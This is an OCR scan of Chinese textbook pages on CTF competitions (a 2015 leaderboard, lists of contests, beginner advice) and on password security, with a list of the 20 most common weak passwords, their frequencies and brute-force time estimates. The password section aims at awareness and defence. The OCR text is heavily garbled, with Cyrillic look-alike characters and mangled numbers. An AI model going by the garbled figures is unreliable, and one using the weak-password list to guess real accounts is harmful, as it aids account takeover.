
Place Team Country Rating 


“1 Plaid Parliament of Pwning 975.183 
Place Team Country Points 
2 Oops 643 015 
м1 StratumAuhuur = 40.000 
Огадоп Sector 588 082 
2 «ша 
Gallopsled 577 427 
3 hack ERS 
464 655 


20 teams tota asks and writeups 


PHD CTF Finals 2015 
АА 27, 1500 UTC | Moscow, Russia 


453 102 


ISpamAndHex 449 797 


=i 

Lal 

Кы 

= 

blue-lotus | 
= 

- | 

ва 


217 390.529 


Place Team 


3 

4 

5 

Б dcua 

7 

8 
Country Points 

9 


Tasteless 372 674 


1 More Smoked Leet = 20.000 


“ 


1 Samurai Е 346 926 Сһіскеп 


Really Мопатев Рог 12.726 
Full rating | Rating formula 
. Rdot.org 9.707 
Upcoming events пъ 
Format Name Date Duration 
PoliGTF 2015 +R 10. 
© Onine 2015 09.00 
09:00 UTC 


10-1 СТЕТІМЕ Е 


2а Oh 


根据 CITFTIME 网 站 的 总 结 ， 国 际 知名 赛事 如 下 。 


v V Vv у Vv у у у v v v 


> 


DEFCON СТЕ: СТЕЖЗ F 9 “ЖЖ” 

UCSB iCTF: 来 自 UCSB 的 面 向 世界 高 校 的 CTF。 

Plaid СТЕ: 包抄 多 项 赛事 冠军 的 CMU 的 PPP 团 队 举 办 的 在 线 解 题 赛 。 

Boston Key Party: 近年 来 崛起 的 在 线 解 题 赛 。 

ХХСЗ СТЕ: 欧洲 历史 最 悠久 CCC 黑 客 大 会 举办 的 CTF。 

SIGINT СТЕ: 德国 CCCAC 协 会 另 一 场 解 题 模式 竞赛 。 

Hack.lu CTF: 卢森堡 黑客 会 议 同期 举办 的 CTF。 

EBCTF: 由 和 荷兰 老牌 强 队 Eindbazen 组 织 。 

Ghost in Ше Shellcode: 由 Marauders 和 Men in Black Hats 共 同 组 织 的 在 线 解 题 赛 。 
RwthCTF: 由 德国 OldEurOpe 组 织 的 在 线 攻防 赛 。 

RuCTF: 由 俄罗斯 Hackerdom 组 织 ， 解 题 模式 资格 赛 面 向 全 球 参赛 ， 混 合 模式 的 决 
赛 面向 俄罗斯 队伍 的 国家 级 竞赛 。 

RuCTFe: 由 俄罗斯 Hackerdom 组 织 的 面向 全 球 的 在 线 攻 防 赛 。 

PHD СТЕ: 俄罗斯 Positive Hacking Day 会 议 同期 举办 的 CTF。 


国内 知名 赛事 如 下 。 


> 


ХСТЕ-ЕЖЯ: 中 国 网 络 空 间 安 全 协会 竞 评 演练 工作 组 主办 、 南 京 赛 宁 承办 、 
KEEN TEAM 协 办 的 全 国 ' 性 网 络 安 全 赛事 平台 ，2014 一 2015 赛 季 五 站 选拔 赛 分 别 由 
清华 、 上 交 、 浙 大 、 杭 电 和 成 信 技 术 团 队 组 织 (包括 杭 电 HCTF、 上 成 信 SCTF、 清 


вт 
华 BCTF、 上 交 OCTF 和 浙大 ACTF) ，XCTF 联 赛 总 决赛 由 蓝 莲 花 战队 组 织 ， 是 国 
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内 最 权威 、 最 高 技术 水 平 与 最 大 影响 力 的 CTF 赛 事 平台 。 
АПСТЕ: 由 阿里 巴巴 公司 组 织 ， 面 向 在 校 学 生 的 CTF 竞 赛 ， 冠 军 奖 金 10 万 元 加 


ү 


BlackHat 全 程 费 用 。 

> ХОСТЕ: 由 西安 电子 科技 大 学 信息 安全 协会 组 织 的 CTF 竞 赛 ， 其 特点 是 偏向 于 渗 
透 实战 经 验 。 

> НСТЕ: 由 杭州 电子 科技 大 学 信息 承办 组 织 的 CTF。 

> ISCC: 由 北 理工 组 织 的 传统 网 竞赛 ,最近 两 年 逐渐 转向 CTF 赛 制 。 


10.1.3 ”如何 开局 CTF 之 旅 


由 于 CTF 大 赛 中 含有 几乎 所 有 的 信息 安全 知识 《二进制 程序 的 逆向 分 析 、 二 进 制程 序 
的 漏洞 挖掘 与 利用 、 操 作 系统 内 核 安 人 全、 移动 安全 〈 安 早 逆 问 与 漏洞 分 机 、IOS 逆 加 与 漏 
洞 分 析 ) 、 网 络 协议 分 析 、Web 攻 击 、Web 日 志 审计 与 分 析 、 隐 写 术 、 密 码 学 应 用 、 路 由 
器 漏洞 利用 、ACM 编 程 、 各 种 环境 的 取证 分 析 等 ) ， 所 以 十 分 适合 基础 扎实 的 安全 技术 
爱好 者 。 

如 果 只 是 基础 扎实 可 没 法 玩 转 CTF， 还 需要 对 各 个 方面 知识 的 深入 理解 和 应 用 。 安 全 
是 一 门 偏重 应 用 的 学 科 ， 很 多 安全 问题 并 不 是 出 在 理论 不 健全 上 ， 而 是 在 实施 的 时 候 出 
了 这 样 那样 的 问题 。 碰 到 不 懂 的 问题 ， 不 能 看 了 别人 写 的 Writeup 《Writeup 的 字面 含义 是 
“新 手 必 看 ”， 在 CTF 竞 赛 中 ， 参 赛 选 手 解 题 的 思路 及 过 程 被 称 为 Writeup， 通 常用 于 记录 
和 交流 ， 供 他 人 学 习 等 ) 就 觉得 自己 也 会 了 ， 一 定 要 自己 动手 实践 。 


10.1.4 一 些 经 验 


对 于 还 没 参加 过 线 下 CTF 况 赛 的 笔者 来 说 ， 专 门 请 教 了 茶 知名 “ 赛 棍 ”〔 对 资深 选手 
的 昵称 ) ， 总 结 了 一 些 经 验 分 享 给 大 家 。 

第 一 ， 解 题 型 的 比赛 一 定 不 要 在 一 道 题目 上 卡 太 久 ， 随 时 把 思路 记录 下 来 ， 暂 时 没有 
思路 就 去 尝试 一 下 其 他 题目 ， 然 后 再 回来 继续 。 

第 二 ， 面 对 国内 的 比赛 时 ， 脑 洞 一 定 要 大 ， 因 为 国内 很 多 出 题 人 还 控制 不 好 难度 高 和 
脑 洞 大 之 间 的 区 别 ， 一 定 要 发 散 思 维 。 

第 三 ， 平 时 见 到 好 的 文章 技巧 ， 或 者 目 己 踩 过 的 “ 坑 ”， 一 定 要 全 部 记 在 一 个 小 本 上 
方便 查阅 ， 不 然 很 可 能 有 的 “ 坑 ” 还 要 掉 第 二 次 。 

第 四 ， 终 问 一 定 要 美化 ， 不 然 做 题 的 效率 会 非常 低 。 

第 五 ， 很 多 Web 的 问题 ， 其 实在 想 明 白 之 后 都 是 可 以 在 本 地 搭 环境 调试 或 者 fuzz( 模 
糊 测 试 ) 的 ， 千 万 不 要 不 动手 。 

第 六 ， 一 定 要 多 回 搜 索引 擎 请 教 。 

读者 在 学 习 了 安全 的 基础 知识 ， 了 解 了 一 些 基 本 技巧 和 经 验 之 后 ， 就 可 以 开始 目 己 的 
CTF 之 旅 了 。 
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密码 安全 问题 确实 是 计算 机 安全 中 十 分 重要 上 且 大 多 数 人 无 法 有 效 解决 的 严重 问题 。 
我 们 发 现 越 来 越 多 的 地 方 需要 设置 密码 ， 甚 至 有 些 地 方 同 时 需要 多 个 密码 来 确保 安全 〈 例 
如 登录 密码 和 支付 密码 ) ， 这 就 使 我 们 陷入 了 两 难 的 境地 一 一 设置 简单 好 记 的 密码 不 够 安 
全 ， 但 相对 安全 的 复杂 密码 又 实在 难以 记忆 。 

针对 这 个 问题 ， 最 好 的 解决 方法 就 是 了 解 攻 击 者 的 攻击 思路 以 及 手段 ， 有 针对 性 地 设 
置 强度 高 但 又 不 至 于 难以 记忆 的 系列 密码 。 这 么 说 可 能 有 点 抽象 ， 接 下 来 ， 让 我 们 从 弱 口 
令 开始 ， 一 点 点 地 开始 分 析 。 

这 里 先 列 出 一 些 密码 ， 请 找 找 有 没有 上 自己 熟悉 的 密码 ? 

123456 

123456789 

12345678 

111111 

123123 

11111111 

5201314 

000000 

123321 

00000000 

1234567890 

123123123 

1314520 

1234567 

12345 

666666 

88888888 

888888 

654321 

112233 

如 果 不 出 所 料 的 话 ， 大 部 分 人 的 某 些 账号 ， 正 是 用 着 这 些 密码 的 其 中 之 一 。 

我 们 通过 搜集 尽量 多 (虽然 相对 于 整个 密码 体系 来 说 还 不 算 多 ， 但 大 体 上 可 以 反映 概 
率 水 平 ) 、 足 够 全 面 的 密码 样本 ， 并 且 通 过 脚本 分 析 ， 计 算出 它们 出 现 的 概率 ， 总 结 出 20 
个 “最 弱 ” 的 密码 ， 评 判 标准 是 它们 出 现 的 频率 ， 如 附 图 1 所 示 。 

相信 大 部 分 人 都 能 在 其 中 找到 目 己 现在 或 是 曾经 使 用 过 的 密码 ， 但 你 可 曾 想 过 它们 是 
有 多 么 不 安全 ? 下 面 不 妨 来 简单 做 一 些 计算 。 

假设 计算 机 每 秒 可 以 尝试 一 百 次 输入 密码 并 立刻 判断 正 误 的 能 力 ， 那 么 位 于 榜首 的 
6 位 纯 数 字 密 码 大 约 需 要 2 小 时 45 分 钟 即 可 全 部 穷 举 (000000—999999) 。 也 就 是 说 ， 最 
多 2 小 时 45 分 钟 后 ， 密 码 就 会 被 破解 ， 不 过 我 们 接着 往 下 看 ， 位 列 第 二 的 “123456789” 
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所 代表 的 9 位 纯 数字 密码 被 穷 举 所 需 的 时 间 大 约 是 115 天 还 要 多 ， 不 过 这 是 否 可 以 说 明 它 
就 是 安全 的 了 呢 ?” 大 家 当然 知道 答案 : 当然 不 是 一 一 因为 人 们 的 假设 是 随机 9 位 数字 ， 而 
123456789 属 于 规律 数字 ， 很 容易 被 人 为 破解 。 


文件 ( ”编辑 (E) 5000) зе) 帮助 {H) 
0. 174270290071 


0. 075297329078 
0. 044501870922 
0. 0298642716312 
0. 0169782148936 
0. 0156901446808 
0. 0137360198582 
0. 00766271276595 
0. 0066593390071 
0. 00657954609929 
0. 00629397021277 
0. 00560862624113 
0. 00508852624113 
0. 0049864539007 
0. 00495495460993 
0. 00485650141844 
0. 00480289574468 
0. 0038556858156 
0. 00324844680851 
0. 00307217943262 


附 图 1 脚本 统计 输出 结果 

因为 这 些 弱 密码 本 身 的 特性 ， 人 们 第 利 会 在 密码 中 加 入 一 些 其 他 元 素 ， 例 如 字母 、 
符号 等 。 一 个 数字 和 英文 字母 (大 小 写 均 可 ) 组 合 的 6 位 密码 ， 按 照 之 前 的 条 件 需 要 18 年 
以 上 的 时 间 才 能 穷 举 完毕 ! 如 果 再 增加 一 位 ， 束 需要 上 千年 的 时 间 来 穷 举 ， 基 本 可 以 认定 
为 暂时 “无 法 穷 举 ”的 密码 〈 随 着 计算 机 计算 性 能 的 提高 ， 所 需 时 间 无 疑 会 不 断 缩短 ， 我 
们 甚至 可 以 预料 到 ， 当 计算 机 计算 能 力 达 到 极限 时 ， 无 论 多 么 复杂 的 密码 都 无 法 摆脱 被 穷 
举 出 来 的 命运 ， 这 时 ， 人 们 就 需要 密码 之 外 的 “外 力 ” 来 干涉 密码 安全 了 。 后 文 会 详细 分 
HT) 。 但 机 需 毕 竞 不 是 恶意 攻击 的 来 源 ， 发 动 恶 意 攻 击 的 是 不 怀 好 意 的 人 ， 他 们 虽 无 法 拥 
有 计算 机 的 强大 计算 能 力 ， 但 他 们 可 以 通过 分 析 来 推导 出 密码 ， 例 如 : 你 的 名 字 叫 张 三 ， 
那么 你 的 密码 极 有 可 能 含有 “ZS” 两 个 字母 ， 如 果 得 知 了 你 的 生日 ， 那 么 攻击 者 又 可 以 
尝试 很 多 种 组 合 ， 如 果 你 的 密码 恰巧 是 这 些 组 合 中 的 一 种 ， 那 么 你 的 密码 依旧 处 于 危险 
之 中 。 

既然 我 们 的 密码 如 此 不 安全 ， 为 什么 密码 被 破解 的 却 只 是 少数 中 的 少数 呢 ? 这 就 是 
因为 我 所 说 的 “外 力 ” 的 存在 。 回 忆 一 下 ， 茶 些 时 候 在 错误 输入 茶 个 密码 时 ， 第 2 次 输入 
和 第 一 次 有 什么 不 一 样 ? 没 错 ! 那 就 是 验证 码 。 现 如 今 ， 很 多 网 站 都 要 求 在 输入 密码 后 输 
入 验证 码 。 顾 名 思 义 ，“ 验 证 码 ” 就 是 验证 是 盏 为 机 器 的 识别 码 ， 优 秀 的 验证 码 需要 做 到 
“人 类 可 以 分 辨 但 机 器 无 法 分 辨 ”。 这 样 ， 之 前 假设 “计算 机 每 秒 进行 一 百 次 破解 ”就 无 
法 成 立 了 。 

在 知道 密码 有 多 不 安全 之 后 ， 下 面 就 要 来 说 一 说 如 何 让 密码 变 得 安全 了 。 

人 们 总 是 会 陷入 前 文 押 提 到 的 这 样 一 个 循环 一 一 容易 记忆 的 密码 不 够 安全 ， 足 够 安全 
的 密 但 却 又 很 难 记忆 。 人 们 拥有 看 成 百 上 干 的 账号 与 密码 ， 想 做 到 一 一 对 应 地 全 部 记 住 ， 
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实在 比较 困难 。 有 些 人 甚至 为 了 图 省 事 ， 将 所 有 密码 都 设置 为 同一 个 ， 结 条 一 处 密码 涝 
露 ， 导 致 此 人 整个 网 络 系统 的 裔 省 。 

如 何 根据 网 站 的 重要 性 与 安全 性 来 设置 相应 的 密码 ， 是 密码 安全 中 十 分 重要 的 一 环 。 
需要 密码 的 账号 大 体 上 分 为 两 类 一 一 相对 安全 的 和 比较 不 安全 的 。 相 对 安全 是 指 该 网 站 用 
户 数量 极其 庞大 ， 本 身 的 安全 措施 非常 严 苛 ， 这 样 的 网 站 安全 性 较 好 ， 不 容易 泄露 ， 应 使 
用 目 己 熟悉 的 密码 但 不 是 可 以 被 穷 举 或 人 为 猜 解 的 弱 口 令 ) 。 比 较 不 安全 是 指 一 些 名 气 
较 低 ， 无 法 确定 安全 性 的 网 站 ， 这 时 如 果 使 用 含有 可 能 透露 目 己 身份 信息 例如 名 字 首 字 
母 、 生 日 等 ) 的 密码 ， 一 旦 泄露 ， “后遗症 ”将 不 堪 设 想 。 此 时 设置 一 个 便于 记忆 ， 难 于 
破解 的 又 与 目 己 无 关 的 密码 ， 才 是 明智 之 举 。 

除了 密码 本 身 ， 有 些 为 了 方便 用 户 的 功能 也 会 成 为 安全 隐患 ， 例 如 入 们 所 熟知 的 一 种 
功能 一 一 密码 找 回 ， 密 码 找 回 旨 在 通过 发 送 右键 /短信 等 来 验证 所 绑 定 的 身份 ， 从 而 在 不 
知道 原 密 码 的 情况 下 直接 修改 密码 。 当 人 们 息 记 目 己 密码 时 ， 这 确实 很 用， 假如 这 些 吴 
份 验证 信息 落 入 他 人 之 手 《〈 例 如 邮箱 账号 被 盗 取 ) ， 那 么 威胁 到 的 是 你 环 环 相 扣 的 整个 密 
码 体系 。 


本 节 只 介绍 了 一 些 非常 基础 的 密码 安全 知识 ， 相 对 复杂 的 《例如 网 上 银行 ) 密码 体系 
需要 较 大 的 篇 幅 才 能 讲 清楚 。 项 望 通过 这 一 小 节 ， 和 帮助 读者 朋友 们 了 解密 码 的 重要 性 ， 遵 
循 密码 安全 人 策略， 提升 防范 意识 ， 防 范 个 人 信息 与 财产 等 受到 威胁 和 攻击 。 
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